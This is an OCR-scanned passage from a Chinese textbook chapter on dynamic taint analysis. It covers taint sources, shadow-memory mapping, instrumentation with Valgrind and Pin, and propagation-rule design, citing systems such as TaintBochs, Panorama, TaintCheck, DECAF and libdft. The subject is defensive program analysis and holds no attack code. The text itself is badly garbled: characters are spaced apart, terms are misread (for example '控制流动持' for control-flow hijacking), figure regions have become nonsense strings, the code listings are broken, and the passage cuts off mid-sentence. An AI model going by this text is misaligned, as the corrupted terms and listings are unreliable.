况 , 最 后 借助 动态 污点 传播 分 析 敏 感 数据 可 能 的 泄露 情况 。 在 具体 实现 的 过 程 中 ,J 
Chow 等 人 不 仅 首 次 提出 了 后 续 工 作 常 常 引 用 的 “影子 内 存 ” 的 概念 ,同时 还 对 系统 实现 
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过 程 中 碰 到 的 “ 查 表 操作 ”“ 常 值 操作 ”等 问题 设计 了 特殊 的 传播 规则 。 最 终 ,J. Chow 等 
人 利用 该 系统 分 析 了 现实 中 的 大 规模 应 用 程序 ,发现 均 存在 敏感 数据 泄露 的 风险 ,其 中 包 
括 当 时 著名 的 Mozilla 浏览 器 .Apache 服务 器 以 及 Perl 脚本 解析 引擎 等 。 

此 外 , 卡 内 基 ，* 梅 隆 大 学 的 H. Yin 等 人 在 2007 年 提出 了 一 种 以 动态 污点 分 析 为 基 
础 的 隐私 窍 取 软件 (包括 间谍 软件 、 键 盘 记 录 器 、 网 络 监听 器 以 及 恶意 后 门 等 ) 的 检测 方 
法 ,并 同样 以 全 系统 虚拟 化 为 基础 实现 了 Panorama 动态 污点 分 析 系 统 。 尽 管 从 基本 思 
想 和 原理 上 来 看 ,Panorama 同样 是 利用 动态 污点 分 析 方 法 跟踪 系统 中 的 敏感 数据 传播 情 
况 ,但 从 所 实现 的 功能 、 性 能 以 及 适用 性 上 来 看 ,该 系统 更 具有 代表 性 。 例 如 ,图 7-2 是 
Panorama 系统 中 的 污点 传播 图 所 描述 的 关于 Google Desktop 软件 窃取 用 户 隐私 的 完整 
过 程 。 


[es) 












WTEMPIOContent IESOJBRMNITqemu(1 }htm 


























WINST_DIRMSTIee taga09pm lm cd | | %INST_DIRYATTeepdaa0guiihhtl 





[enn] 
图 7-2 Google Desktop 隐私 窃取 流程 


7.2 基本 原理 
在 介绍 基本 原理 以 前 ,首先 给 出 图 7-3 所 示 的 示例 代码 ,本 节 将 结合 该 段 代 码 来 曾 述 
污点 分 析 的 基本 原理 和 核心 组 成 。 


在 利用 污点 分 析 方 法 进行 实际 分 析 的 过 程 中 ,首先 需要 确定 污点 源 , 即 污点 分 析 的 目 
标 来 源 。 通 常 来 讲 ,污点 源 表示 了 程序 外 部 数据 或 者 用 户 所 关心 的 程序 内 部 数据 ,例如 ， 
图 7-3 中 的 X 和 YY 均 是 来 自 程序 外 部 (X 来 源 于 硬盘 文件 ,而 Y 来 源 于 网 络 数 据 包 ), 因 
此 可 以 将 其 看 成 这 次 分 析 的 污点 源 。 在 确定 污点 源 之 后 ,需要 在 内 存 中 以 特殊 形式 进行 
标记 ,具体 标记 方法 参见 7.3.2 节 。 

在 随后 的 分 析 中 ,需要 计算 所 有 涉及 污点 的 执行 过 程 。 以 图 7-3 所 示 的 代码 为 例 ,第 
3 一 6 行 均 涉 及 污点 相关 的 操作 ,因此 需要 利用 相关 传播 规则 来 进行 计算 ,具体 过 程 如 下 : 

第 3 行 ,S=X[0]: 该 条 语句 的 语义 是 将 X[0] 的 值 赋予 S, 而 X[0] 是 本 次 分 析 的 污 
点 源 , 因 此 S 将 被 感染 为 污点 数据 ,该 赋值 过 程 称 为 污点 扩散 。 

第 4 行 ,T=S 一 YL[0]: 该 条 语句 的 语义 是 将 S 与 YL0j] 的 差 值 赋予 ,由 于 Y[0] 是 
本 次 分 析 的 污点 源 , 且 S 也 是 污点 数据 ,因此 最 终 的 工 也 将 被 感染 为 污点 数据 。 该 计算 
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图 7-3 污点 分 析 基本 原理 示例 代码 


过 程 也 是 污点 扩散 。 

第 5 行 ,S=0: 该 条 语句 的 语义 是 将 S 置 为 常数 0, 由 于 常数 不 包含 污点 信息 ,因此 S 
也 将 从 污点 变 为 正常 数据 。 该 赋值 过 程 称 为 污点 清除 。 

第 6 行 ,goto T: 该 条 语句 的 语义 是 跳 转 到 全 指向 的 位 置 ,而 由 于 全 在 第 4 行 已 经 被 
感染 为 污点 ,这 意味 着 程序 的 跳 转 目 标 将 受到 污点 的 影响 ,而 由 于 污点 均 来 自 程序 外 部 ， 
因此 程序 的 执行 流程 将 被 外 部 数据 任意 控制 , 即 此 时 发 生 了 典型 的 “控制 流动 持 ”。 

以 上 通过 实例 介绍 了 污点 分 析 方法 的 基本 原理 ,而 通过 总 结 该 过 程 ,可 以 归纳 出 污点 
分 析 相 关 的 核心 要 素 , 如 图 7-3 右 侧 所 示 。 

COD. 污点 源 : 是 污点 分 析 的 目标 来 源 ,通常 表示 来 自 程序 外 部 的 不 可 信 数 据 ,包括 硬 
盘 文件 内 容 、 网 络 数据 包 等 。 

(2) 传播 规则 : 是 污点 分 析 的 计算 依据 ,通常 包括 污点 扩散 规则 和 清除 规则 ,其 中 普 
通 赋值 语句 、 计 算 语句 可 使 用 扩散 规则 ,而 常 值 赋 值 语句 则 需要 利用 清除 规则 进行 计算 。 

G) 污点 检测 : 是 污点 分 析 的 功能 体现 ,其 通常 在 程序 执行 过 程 中 的 敏感 位 置 进行 
污点 判定 ,而 敏感 位 置 主要 包括 程序 跳 转 以 及 系统 函数 调用 等 。 


7.3 主要 方法 


本 节 对 相关 组 成 要 素 在 实际 应 用 中 可 能 的 实现 方法 进行 详细 描述 ,主要 包括 污点 源 
识别 ,污点 内 存 映射 .污点 动态 跟踪 、 传 播 规 则 设计 以 及 污点 误 用 检测 。 需 要 说 明 的 是 , 考 
虑 到 静态 方法 已 经 难以 适用 于 现实 场景 ,以 下 内 容 如 果 没 有 特殊 说 明 , 均 以 动态 污点 分 析 
为 介绍 对 象 。 
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731 污点 源 识 别 


污点 分 析 的 第 一 项 工作 就 是 进行 污点 源 的 识别 ,而 完整 和 高 效 的 污点 源 识别 是 保证 
后 续 污点 分 析 正 确 性 的 前 提 。 正 如 7.2 节 所 述 , 人 们 在 使 用 污点 分 析 方 法 时 ,一 般 将 来 自 
程序 外 部 的 输入 数据 标记 为 污点 源 ,例如 ,程序 从 硬盘 读 取 的 文件 内 容 以 及 从 网 络 接收 的 
数据 包 都 可 以 看 作 是 污点 源 ,而 对 于 污点 源 的 识别 也 正 是 通过 监控 程序 从 外 部 读 取 文件 
和 接收 数据 包 相关 的 系统 调用 来 实现 的 。 

目前 ,污点 源 识别 方法 主要 分 为 两 类 : 一 类 是 无 约束 识别 , 即 所 有 从 外 部 读 取 的 数据 
内 容 都 作为 污点 源 标记 ; 另 一 类 是 有 约束 识别 , 即 只 有 从 特定 文件 或 者 网 络 地 址 读 取 的 数 
据 内 容 才 作为 污点 源 处 理 。 考 虑 到 现 有 操作 系统 提供 给 应 用 程序 的 外 部 数据 读 取 规范 ， 
在 实现 相关 污点 源 识别 方法 时 将 会 面临 较 大 的 差别 。 

这 里 以 Windows 中 读 取 文 件 的 过 程 为 例 进行 详细 介绍 。 对 于 无 约束 污点 源 识别 ,只 
需要 监控 程序 中 所 有 调用 ReadFile 函数 的 位 置 即 可 ,如 图 7-4(a) 所 示 , 通 过 识别 该 函数 
调用 时 的 读 入 缓冲 区 参数 以 及 函数 返回 后 的 读 取 长 度 参 数 即 可 保证 污点 源 的 正确 识别 。 
而 对 于 有 约束 的 污点 源 识别 则 需要 进行 如 图 7-4(b) 所 示 的 处 理 : 首先 ,监控 程序 中 调用 
CreateFile 的 所 有 位 置 , 并 通过 比较 该 函数 中 的 文件 名 参数 来 判断 是 否 是 我 们 所 要 进行 
监控 的 文件 ,如 果 是 ,就 记录 该 函数 返回 的 文件 句柄 ;其 次 ,监控 程序 中 调用 ReadFile 的 
所 有 位 置 (如 果 熟 悉 操作 系统 内 核 数据 结构 ,可 以 只 监控 这 一 个 函数 来 实现 有 约束 识别 )， 
通过 比较 函数 参数 中 的 文件 句柄 来 判断 是 否 是 从 我 们 所 关心 的 文件 中 读 取 数据 ,如 果 是 ， 
则 按照 无 约束 污点 源 识 别 的 方法 ,通过 提取 读 入 缓冲 区 和 实际 读 和 长度 等 参数 来 保证 污 
点 源 的 正确 识别 ;最 后 , 当 程 序 调用 CloseHandle 函数 时 ,还 需要 通过 提取 相关 的 参数 来 
判断 程序 是 否 正在 关闭 我 们 所 关心 的 文件 ,如 果 是 ,将 不 再 进行 后 续 污点 源 识别 。 


1. fileHandle1 = CreateFile(targetFileName,…) 
2. fileHandle2 = CreateFile(otherFileName, …) 


1. ReadFile(fileHandle1, rBuffer1, ***, &readNum1, **:) 


^N 


污点 : 3. ReadFile(fileHandle1, rBuffer1, ***, &readNum1, …) 


g 


2. ReadFile(fileHandle2, rBuffer2, ***, &readNum2, …) || *** 污点 源 


4. ReadFile(fileHandle2, rBuffer2, ***, &readNum2, …) 


5. CloseHandle(fileHandle1) 

















(a) 无 约束 污点 源 识别 (b) 有 约束 污点 源 识别 
图 7-4 污点 源 识别 流程 


从 以 上 两 类 方法 描述 可 以 看 出 ,尽管 无 约束 识别 方法 较为 简单 直接 ,但 由 于 其 在 实 
际 使 用 过 程 中 带 来 较 多 的 “污点 噪音 ?而 导致 分 析 效 率 降低 问题 ,因此 ,除非 是 实际 分 
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析 的 需要 (例如 J. Chow 等 人 在 进行 全 系统 数据 跟踪 时 采用 该 方法 ) ,一 般 情况 下 不 推 
荐 使 用 该 方法 ;而 对 于 有 约 东 的 污点 源 识别 ,尽管 可 以 保证 只 对 满足 特定 条 件 的 数据 
进行 跟踪 ,但 为 了 实现 该 方法 需要 按照 系统 调用 规范 监控 较 多 的 函数 调用 以 及 相关 的 
函数 提取 。 


732 污点 内 存 映 射 


无 论 是 为 了 记录 污点 源 的 产生 ,还 是 为 了 在 后 续 分 析 过 程 中 跟踪 污点 的 扩散 、 清 除 过 
程 ,都 需要 一 种 方法 来 记录 数据 的 污点 状态 变化 ,研究 人 员 为 此 提出 了 “影子 内 存 ” 的 概 
念 。 而 关于 影子 内 存 映射 主要 分 为 两 个 阶段 : 映射 过 程 和 内 存 表 示 。 其 中 ,内 存 表 示 将 
在 7.3.3 节 详 细 描述 。 映 射 过 程 可 以 分 为 3 种 方法 , 即 简单 映射 、 页 表 映 射 , 复 杂 映 射 , 接 
下 来 对 每 一 种 映射 过 程 及 其 优 缺 点 进行 详细 的 介绍 。 

1. 简单 映射 方法 

在 早期 的 研究 过 程 中 ,人 们 只 是 简单 地 为 每 一 个 被 污染 的 内 存 地 址 或 者 CPU 寄存 
器 额外 分 配 一 个 对 应 的 内 存 映射 空间 。 该 方法 最 早 应 用 在 2004 年 ]. Chow 提出 的 
TainBochs 系统 中 ,其 具体 做 法 是 : 对 于 一 个 字 节 大 小 的 内 存 地 址 ,往往 是 只 使 用 一 个 能 
够 表示 0 和 1 的 位 即 可 ,其 中 0 表示 未 污染 ,1 表示 已 污染 ;此 外 ,如 果 希 望 完整 记录 整个 
字 节 中 每 个 位 的 污染 状态 , 则 需要 额外 分 配 一 个 字 节 的 内 存 空间 来 进行 映射 。 上 述 两 种 
映射 过 程 如 图 7-5 所 示 。 
































































































































byte 1 byte 1 
[高 精确 ] : LLELEI | 
[ 低 效率 ] | | | 
byten byten 
(a) 完整 映射 
byte 1 bit 1 
bit-e bit. 
me; DOTT TORT ------- 
[高 效率 | LLLLAE | 
tem bit n 
(b) 压缩 映射 


图 7-5 两 种 简单 映射 方法 示意 图 


需要 说 明 的 是 ,无 论 采 用 哪 一 种 形式 ,这 类 方法 都 需要 在 污点 分 析 之 前 预先 分 配 较 大 
的 内 存 空 间 ,而 这 也 是 简单 映射 方法 的 主要 问题 所 在 。 以 分 析 一 个 32 位 Windows 系统 
中 的 普通 程序 为 例 , 即 使 采用 压缩 映射 且 不 考虑 内 核 地 址 空间 ,也 至 少 需要 2GB/8 — 
256MB 的 地 址 空间 。 不 过 ,相对 于 其 问题 而 言 ,简单 映射 方法 的 主要 优点 体现 在 进行 污 
点 状态 更 新 和 查询 时 只 需要 很 小 的 计算 开销 即 可 完成 。 这 里 所 说 的 计算 开销 主要 包括 两 
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个 方面 : 

CD 分 配 开销 。 由 于 简单 映射 方法 是 在 分 析 之 前 对 整个 内 存 映 射 空间 进行 了 预 分 
配 ,因此 在 实际 使 用 过 程 中 不 存在 额外 的 分 配 开销 。 

(2) 查询 开销 。 对 于 完整 映射 方法 而 言 , 直接 以 实际 地 址 来 进行 内 存 取 值 操作 即 可 
完成 ,对 于 压缩 映射 方法 ,需要 进行 一 次 除法 和 一 次 取 余数 操作 。 

2. 页 表 映 射 方 法 

针对 简单 映射 方法 存在 较 大 的 开销 问题 ,J. Newsome 在 2004 年 提出 的 TaintCheck 
系统 中 首次 使 用 一 种 类 似 页 表 映 射 的 方法 来 实现 影子 内 存 , 随 后 出 现 的 TEMU, DECAF 
等 污点 分 析 系 统 均 使 用 了 类 似 方 法 。 典 型 的 页 表 机 制 如 图 7-6 Bros 。 
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图 7-6 页 表 映 射 机 制 


尽管 从 理论 上 来 讲 , 使 用 页 表 机 制导 致 在 污点 分 析 过 程 中 会 出 现 大 量 的 分 配 开销 ,但 
通过 实际 的 污点 扩散 统计 情况 来 看 ,普通 应 用 程序 在 处 理 污 点 数据 时 都 进行 的 是 密集 型 
操作 , 即 污 点 并 不 会 在 程序 的 整个 内 存 空间 任意 扩散 。 因 此 在 实际 使 用 过 程 中 ,页 表 机 制 
并 没有 带 来 较 大 的 分 配 开销 ,而 这 也 是 后 续 的 污点 分 析 系 统 都 将 页 表 机 制作 为 影子 内 存 
的 首选 实现 方法 的 原因 。 

3. 复杂 映射 方法 

尽管 通过 简单 映射 和 页 表 映 射 已 经 可 以 应 对 大 部 分 污点 分 析 任 务 , 但 是 对 于 影子 内 
存 问题 本 身 来 讲 ,这 两 种 方法 只 是 提供 了 一 种 具体 的 映射 方案 。 从 2007 年 开始 ， 
Valgrind 的 开发 者 N. Nethercote 对 影子 内 存 问题 进行 了 专门 的 研究 ,并 根据 不 同 应 用 需 
求 提出 了 较为 抽象 的 映射 模型 ,如 图 7-7 所 示 。 

此 外 ,2010 4E MIT 的 Q. Zhao 等 人 设计 了 一 种 独立 于 特定 系统 且 易 扩展 的 影子 内 存 
映射 模型 一 一 Umbra, 该 模型 是 首 个 支持 64 位 系统 的 方案 。 此 外 ,和 Valgrind 的 默认 映 
射 机 制 相 比 ,该 方法 具有 更 高 的 效率 。2012 年 ,由 哥伦比亚 大 学 的 V. P. Kemerlis 在 研究 
轻 量 级 污点 分 析 系 统 libdft 时 ,提出 了 一 套 较为 高 效 的 污点 映射 机 制 , 如 图 7-8 所 示 。 
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特殊 二 级 映射 表 


二 级 映射 表 2 


7-7 ”影子 内 存 映射 模型 


二 级 映射 表 1 
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图 7-8 libdft 影子 内 存 框 架 


733 污点 动态 跟踪 


污点 动态 跟踪 是 污点 分 析 主 要 的 中 间 过 程 ,也 是 整个 分 析 过 程 中 最 为 复杂 的 一 项 。 
在 动态 跟踪 过 程 中 ,一 般 需 要 涉及 3 个 阶段 , 即 动态 指令 监控 ,污点 传播 计算 以 及 污点 状 
态 更 新 。 其 中 ,动态 指令 监控 是 进行 污点 跟踪 的 前 提 , 只 有 正确 监控 程序 执行 过 程 中 运行 
的 每 条 指令 ,才能 有 效 分 析 污 点 的 处 理 过 程 ;污点 传播 计算 则 通过 分 析 每 条 监控 指令 的 语 
义 信息 ,并 利用 相关 的 污点 扩散 、 清 除 规则 来 保证 正确 的 传播 过 程 ;污点 状态 更 新 是 反映 
传播 计算 的 结果 ,其 一 般 通 过 更 新 影子 内 存 来 实现 ,但 是 不 同 的 污点 内 存 表示 形式 ,其 更 
新 过 程 往往 会 有 较 大 的 差别 。 接 下 来 对 每 一 个 阶段 所 涉及 的 具体 内 容 进行 详细 描述 。 

1. 动态 指令 监控 

动态 指令 监控 也 称 动态 指令 插 装 ,其 基本 原理 是 : 通过 将 程序 加 载 到 模拟 CPU 上 运 
行 ,保证 在 程序 每 条 指令 或 每 个 方法 执行 之 前 和 之 后 可 以 提供 相应 的 分 析 接 口 给 用 户 , 进 
而 实现 程序 的 动态 分 析 。 根 据 监控 的 对 象 不 同 , 现 有 动态 指令 监控 技术 主要 分 为 两 类 : 
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一 类 是 应 用 程序 级 的 指令 监控 , 另 一 类 是 系统 级 的 指令 监控 。 应 用 程序 级 指令 监控 相对 
来 说 实现 过 程 较 为 简单 ,并 且 也 已 经 出 现 了 很 多 成 熟 的 实用 工具 ;而 对 于 系统 级 监控 来 
说 ,由 于 需要 考虑 的 因素 较 多 ,其 实现 过 程 也 十 分 复杂 (一 般 需 在 硬件 虚拟 化 平台 上 扩展 
实现 ), 目 前 只 有 在 学 术 研 究 领 域 有 所 提 及 。 因 此 ,考虑 到 相关 方法 的 成 熟 度 和 本 书 的 定 
位 ,本 节 只 以 应 用 程序 级 指令 监控 方法 为 介绍 对 象 ,对 系统 级 指令 监控 感 兴趣 的 读者 可 以 
阅读 文献 [13] 或 参考 7.4 节 内 容 。 

在 众多 已 有 工具 中 ,以 Linux 程序 分 析 为 主 的 开源 软件 Valgrind 和 以 Windows ff 
序 分 析 为 主 的 商业 软件 Pin 由 于 提供 了 强大 的 分 析 能 力 和 简易 的 插件 机 制 ,逐渐 成 为 目 
前 主流 的 动态 插 装 工具 。 尽 管 两 个 工具 都 提供 了 相似 的 动态 指令 监控 能 力 , 但 是 从 底层 
实现 原理 上 来 讲 ,Valgrind 和 Pin 分 别 对 指令 插 装 问题 提出 了 不 同 的 解决 思路 , 即 D&R 
(Disassemble-and-Resynthesize, 反 汇编 与 重组 ) 和 C8. A CCopy-and-Annotate, 复制 和 注 
释 ) 。 接 下 来 简要 介绍 D&R 和 C&A 两 种 指令 插 装 方法 的 主要 流程 。 

Valgrind 使 用 的 D&R 思路 是 : 首先 ,将 程序 运行 的 机 器 码 转 换 成 一 条 或 者 多 条 中 
间 表 示 形 式 (Intermediate Representation. IR) ;其 次 ,针对 每 一 条 IR 添加 分 析 指 令 ,并 将 
这 些 分 析 指令 同样 转化 为 多 条 IR; 最 后 ,通过 将 所 有 的 TR. 再 次 重组 成 机 器 码 的 形式 ,最 
终 实 现 指令 持 装 的 功能 。 为 了 展示 相关 功能 ,图 7-9 给 出 了 一 段 利 用 Valgrind 进行 指令 
动态 监控 的 代码 以 及 运行 结果 。 








Ox24F27C: addl %ebx,%eax 
: -~---- IMark(Ox24F27C, 2) ------ 

PUT(60) = 0x24F27C:132 * 

t3 = GET:I32(0) * 

t2 = GET:132(12) * 

ti = Add32(t3,t2) # addı 

PUT(32) = 0x3:I32 # put eflags vali 

10: PUT(36) = t3 + 


vonon s 


put eflags val2 








11: PUT(40) = t2 # put eflags val3 
12: PUT(44) = 0x0:I32 # put eflags val4 
13: PUT(0) = t1 # put Weax 





图 7-9 Valgrind 工作 流程 以 及 实际 运行 效果 


Pin 使 用 的 C&A 思路 如 图 7-10 所 示 。 首 先 将 程序 运行 的 代码 原封 不 动 地 复制 一 
份 ,并 利用 自身 包含 的 即时 编译 器 (JustrIn-Time,JIT) 从 代码 副本 中 获取 一 定数 量 的 代 
码 进行 编译 ;随后 ,编译 器 会 生成 同样 架构 下 的 代码 并 添加 额外 的 注释 方法 ;最 后 ,通过 将 
新 生成 的 代码 和 注释 方法 一 起 执行 的 方式 实现 指令 的 插 装 功能 。 和 Valgrind 相 比 ,通过 
Pin 可 以 直接 获取 运行 在 处 理 器 上 的 原始 代码 ,此 外 ,Pin 还 为 用 户 开发 相应 的 分 析 工 具 
提供 了 更 加 丰富 的 调用 接口 ,以 便 完 成 更 加 复杂 的 功能 和 任务 。 

由 于 Valgrind 和 Pin 相关 的 资料 较 多 ,因此 ,本 书 对 这 两 种 工具 的 具体 使 用 方法 不 
再 进行 介绍 , 感 兴趣 的 读者 可 以 参看 Valgrind 和 Pin 官方 网 站 提供 的 用 户 使 用 手册 。 

2. 污点 传播 计算 

污点 传播 计算 是 结合 已 有 污点 数据 和 程序 执行 过 程 来 实现 污点 扩散 或 者 漂白 的 过 
程 , 是 污点 分 析 过 程 中 最 关键 的 步骤 之 一 。 在 进行 传播 计算 的 过 程 中 ,往往 需要 明确 以 下 
两 个 最 重要 的 内 容 : 
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图 7-10 Pin 工作 流程 以 及 实际 运行 效果 


首先 ,从 分 析 的 信息 流 种 类 来 看 ,可 以 将 传播 计算 分 为 面向 数据 流 的 传播 和 面向 控制 
流 的 传播 。 数 据 流传 播 计算 较为 简单 直接 ,其 只 需要 依赖 当前 执行 指令 的 语义 信息 ,并 根 
据 相 应 的 传播 规则 即 可 完成 计算 过 程 ;而 对 于 控制 流 来 说 ,污点 传播 计算 过 程 则 变 得 十 分 
复杂 烦琐 ,其 一 般 需 要 静态 预 分 析 过 程 ,然后 对 程序 执行 过 程 中 条 件 跳 转 指令 影响 到 的 所 
有 指令 进行 集中 分 析 。 需 要 说 明 的 是 ,如 果 不 进行 有 限 的 控制 流传 播 计算 ,那么 在 实际 操 
作 的 过 程 中 就 可 能 由 于 引入 了 大 量 的 污点 数据 而 导致 程序 整个 内 存 被 感染 ,从 而 导致 分 
析 失 效 。 由 于 利用 面向 数据 流 的 传播 计算 过 程 已 经 可 以 解决 大 多 数 问题 ,因此 大 多 数 污 
点 分 析 系 统 在 实现 过 程 中 并 没有 考虑 面向 控制 流 的 传播 计算 , 如 TaintCheck、 
TaintScope、TaintBochs。 如 果 读 者 对 于 控制 流 相 关 的 污点 传播 计算 感 兴趣 ,可 以 阅读 已 
有 的 代表 性 工作 ,如 Dytan、DTA++。 在 后 续 描 述 过 程 中 ,如 果 不 加 特殊 说 明 , 均 指 面向 
数据 流 的 污点 传播 。 

其 次 ,在 进行 污点 传播 计算 的 过 程 中 ,需要 进行 计算 粒度 的 选择 。 一 般 情况 下 ,为 了 
方便 计算 ,主要 进行 面向 操作 数 的 污点 传播 , 即 无 论 操 作 数 占用 多 少 字 节 ,如 果 其 中 一 个 
字 节 是 污点 , 则 将 整个 操作 数 看 作 一 个 污点 单元 ,随后 根据 指令 的 传播 规则 来 进行 整体 计 
算 。 尽 管 这 种 方案 较为 直接 和 简单 ,但 是 该 方案 由 于 计算 粒度 较 大 ,导致 存在 明显 的 “过 
污染 ”问题 , 即 扩大 污点 的 影响 范围 。 此 外 ,为 了 缩小 污点 传播 的 粒度 ,一 种 可 能 的 方案 是 
面向 字 节 级 的 传播 计算 , 即 对 于 任意 指令 中 的 操作 数 ,在 进行 污点 计算 的 过 程 中 ,按照 源 
操作 数 和 目的 操作 数 的 对 应 字 节 进行 计算 。 尽 管 面 向 字 节 级 的 传播 规则 能 够 很 大 程度 上 
解决 “过 污染 ”问题 ,但 是 这 种 方法 在 进行 实际 操作 (32 位 系统 下 ,操作 数 往往 都 是 4 个 字 
节 ) 时 由 于 会 进行 逐个 字 节 的 污点 计算 ,因此 导致 传播 计算 的 效率 降低 。 最 后 ,在 2014 年 
由 尹 恒 团队 实现 的 DECAF 系统 首次 使 用 了 基于 位 粒度 的 污点 传播 计算 ,并 依据 相关 理 
论 模型 证 明了 计算 过 程 的 有 效 性 和 可 靠 性 。 
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3. 影子 内 存 更 新 

影子 内 存 的 更 新 往往 直接 反映 了 程序 运行 中 的 污点 扩散 和 漂白 过 程 。 目 前 ,影子 内 
存 更 新 的 主要 策略 包括 两 类 ,一 种 是 需要 配合 回溯 分 析 的 简单 更 新 策略 , 男 一 种 是 不 需要 
回溯 配合 的 多 标签 更 新 策略 ,如 图 7-11 所 示 。 前 一 种 方式 的 更 新 策略 是 : 如 果 在 污点 计 
算 的 过 程 中 有 新 的 污点 产生 ,那么 在 其 对 应 的 影子 内 存 中 将 污点 状态 置 为 1 即 可 。 这 种 
策略 虽然 计算 过 程 较为 简单 ,但 往往 需要 在 污点 传播 之 后 结合 污点 回溯 的 方式 来 实现 预 
期 目标 。 而 后 一 种 方式 的 更 新 策略 是 : 当 有 新 的 污点 数据 产生 时 ,用 产生 该 污点 的 污点 
源 来 表示 即 可 。 这 种 方式 虽然 可 以 在 污点 分 析 的 任意 时 刻 获 取 其 相关 的 污点 源 ,但 是 由 
于 在 程序 运行 的 过 程 中 往往 涉及 内 存 的 频繁 分 配 和 释放 ,因此 导致 分 析 的 效率 较 低 。 不 
过 由 于 第 二 种 方案 不 需要 污点 回溯 分 析 , 因 此 也 是 大 多 数 系统 常用 的 一 种 影子 内 存 更 新 
策略 。 











mov eax, [inputo] T1 Tea: To7 Ti - T? -T3 
movecx [input] | > |Te1 Teo: Ta- Ts Tg - T; 
add ecx, eax Tai Tea: To- Ti- T2 7 T4- T4 - Ts - Tg -T; 














图 7-11 两 种 污点 内 存 更 新 方式 


734 传播 规则 设计 


1. 规则 的 完备 性 和 精确 性 

传播 规则 设计 是 实现 污点 分 析 系 统 中 最 关键 的 步骤 之 一 ,从 理论 上 来 讲 , 其 完备 性 和 
精确 性 决定 了 所 实现 的 系统 是 否 能 够 真正 解决 目标 领域 中 的 安全 问题 。 规 则 完备 性 是 指 
传播 计算 过 程 中 将 应 该 标记 的 污点 进行 了 正确 的 标示 ,而 精确 性 是 指 传播 过 程 中 只 将 应 
该 标记 的 污点 进行 标示 。 如 果 在 规则 设计 中 忽略 完备 性 ,那么 在 相关 安全 应 用 过 程 中 往 
往 会 出 现 攻击 漏 报 的 情况 。 如 果 不 考 虑 精确 性 ,那么 将 会 出 现 攻 击 误 报 的 情况 。 

在 现 有 的 污点 分 析 系 统 实现 过 程 中 ,大 多 数 研发 人 员 由 于 实现 过 程 的 复杂 和 烦琐 , 往 
往 会 在 保证 功能 目标 的 前 提 下 降低 规则 的 完备 性 和 精确 性 要 求 。 例 如 ,TaintBochs 系统 
在 满足 跟踪 敏感 数据 生命 周期 的 功能 前 提 下 ,忽略 对 于 标志 寄存 器 的 污点 跟踪 , 即 不 考虑 
规则 的 完备 性 ;TaintCheck 系统 在 满足 漏洞 利用 攻击 检测 的 前 提 下 ,不 仅 忽 略 对 于 标志 
寄存 器 的 跟踪 ,同时 还 忽略 了 对 于 规则 精确 性 的 要 求 , 即 只 要 求 源 操作 中 存在 任意 一 个 字 
节 的 污点 , 则 将 计算 后 的 目标 操作 数 全 部 作为 污点 处 理 。 图 7-12 以 加 法 运算 指令 中 的 污 
点 传播 情况 展示 了 考虑 规则 完备 性 和 精确 性 的 结果 和 实际 计算 时 的 情况 。 

2. 面向 原始 指令 或 者 中 间 指 令 

在 传播 规则 设计 过 程 中 ,一 个 很 重要 的 选择 是 其 面向 的 语言 类 型 ,有 以 下 两 种 方式 : 
一 种 方式 是 直接 在 程序 运行 时 的 原始 指令 集 上 进行 规则 设计 ,例如 普通 的 x86, ARM 等 
指令 集 ; 另 一 种 方式 是 首先 将 程序 运行 的 原始 指令 转化 为 一 种 中 间 语 言 的 形式 ,随后 再 基 
于 这 些 中 间 语 言 的 指令 集 进行 传播 规则 设计 ,例如 Valgrind 使 用 的 VEX, QEMU 使 用 的 
TCG 等 。 图 7-13 Æ DECAF 系统 针对 TCG 中 间 语 言 进行 污点 分 析 的 代码 。 
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//, Start of translation block 
0 insert DECAF BLOCK BEGIN callback 
movi.132 tmp21, $«CURRENT. 


d back 
mp4, SDECAF invoke. insn.end callback 


€— d add 


addi $001, Xeax 


mp25, SDECAF invoke. nsn. begin. ca1 back 


» tmpi3 


A Insert p: 'NSN END callback 
vi 132 $DECAF .invoke insn end callback 

c E27 $0x0, $0, env 
//, End of transition block, 

// Insert DECAF BLOCK END callback 

movi i32 tmp27, SDECAF. jnvoke -block-end-caTlback 
call. F- $0x0, 30, 

goto tb 





图 7-13 面向 中 间 语 言 的 污点 分 析 过 程 


选择 原始 指令 集 进行 设计 的 优势 在 于 传播 规则 可 以 精确 反映 污点 在 程序 运行 时 的 传 
播 过 程 ， 其 中 不 存在 因为 指令 转换 导致 的 信息 丢失 问题 ,例如 ,中 间 语 言 在 转换 的 过 程 中 
往往 会 忽略 标志 寄存 器 或 者 类 似 浮 点 .多 媒体 等 复杂 的 计算 指令 集 。 但 这 种 方法 的 缺点 
在 于 原始 指令 集 往往 规模 较为 庞大 。 例 如 ,典型 的 x86 指令 集 包 含 多 达 上 百 条 不 同 的 指 
令 , 如 果 再 考虑 每 条 指令 处 理 操作 数 大 小 的 不 同 , 情 况 将 更 加 复杂 。 此 外 ,除了 处 理 庞杂 
的 原始 指令 集 , 为 了 支持 多 个 硬件 平台 的 污点 分 析 , 一 般 都 需要 对 每 种 目标 指令 集 进 行 重 
新 设计 。 考 虑 以 上 两 个 原因 ,大 多 数 污 点 分 析 系统 都 选择 使 用 较为 精简 的 中 间 语 言 来 完 
成 传播 规则 设计 。 
尽管 中 间 语 言 在 传播 规则 设计 过 程 中 具有 较为 突出 的 优点 ,但 是 在 处 理 对 于 精度 需 
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求 较 高 以 及 安全 问题 聚焦 的 任务 时 ,仍然 需要 根据 程序 的 原始 指令 集 进 行 必要 的 规则 设 
i. 仍然 以 图 7-12 为 例 进行 说 明 。 如 果 进 行 减法 操作 的 两 个 原始 操作 数 都 是 同一 个 寄 
存 器 ,那么 在 实际 污点 分 析 过 程 中 ,需要 对 该 数据 的 污点 状态 进行 漂白 ,但 是 对 应 右边 的 
中 间 语 言 来 看 ,由 于 最 终 相 减 的 是 两 个 不 同 的 变量 ,那么 此 时 将 不 会 进行 漂白 操作 ,进而 
在 后 续 分 析 过 程 中 将 产生 不 可 避免 的 误 报 情况 。 

3. 规则 的 分 类 和 表示 形式 

接 下 来 以 面向 x86 普通 指令 集 为 例 来 具体 说 明 传播 规则 设计 的 相关 步 又。 首先 需要 
根据 其 面向 的 指令 语义 类 型 进行 分 类 。 具 体 而 言 , 一 般 的 指令 可 以 划分 为 以 下 3 种 情况 。 
首先 是 赋值 复制 指令 ,该 类 指令 的 规则 较为 简单 ,只 需要 将 源 操 作 数 的 污点 状态 直接 复制 
给 目的 操作 数 对 应 的 污点 状态 即 可 。 其 次 是 算术 计算 指令 ,该 类 指令 的 规则 较为 复杂 , 需 
要 将 源 和 目的 操作 数 的 污点 状态 合并 后 再 赋 给 最 终 的 结果 数据 所 对 应 的 污点 状态 。 最 后 
